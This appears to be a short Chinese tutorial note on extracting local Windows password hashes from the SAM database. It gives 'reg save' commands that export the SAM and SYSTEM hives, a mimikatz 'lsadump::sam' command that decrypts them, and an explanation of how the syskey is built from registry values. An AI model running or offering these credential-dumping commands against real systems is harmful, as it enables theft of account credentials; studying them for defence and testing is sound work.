方式1:通过SAM数据库获得本地用户HASH
sam文件:是用来存储本地用户账号密码的文件的数据库
system文件:里面有对sam文件进行加密和加密的密钥
利用方式:
导出sam和system:
reg save hklm\sam sam.hiv
reg save hklm\system system.hiv
解密工具mimikatz:
lsadump::sam /sam:sam.hiv /system:system.hiv
原理:
1、读取HKLM\SYSTEM,获得syskey:
syskey的由来: 读取注册表项HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa下的键值JD、Skew1、GBG和Data中的内容,拼接成syskey
syskey的作用: Syskey中的加密的是账号数据库,也就是位于%SystemRoot%\system32\config的SAM文件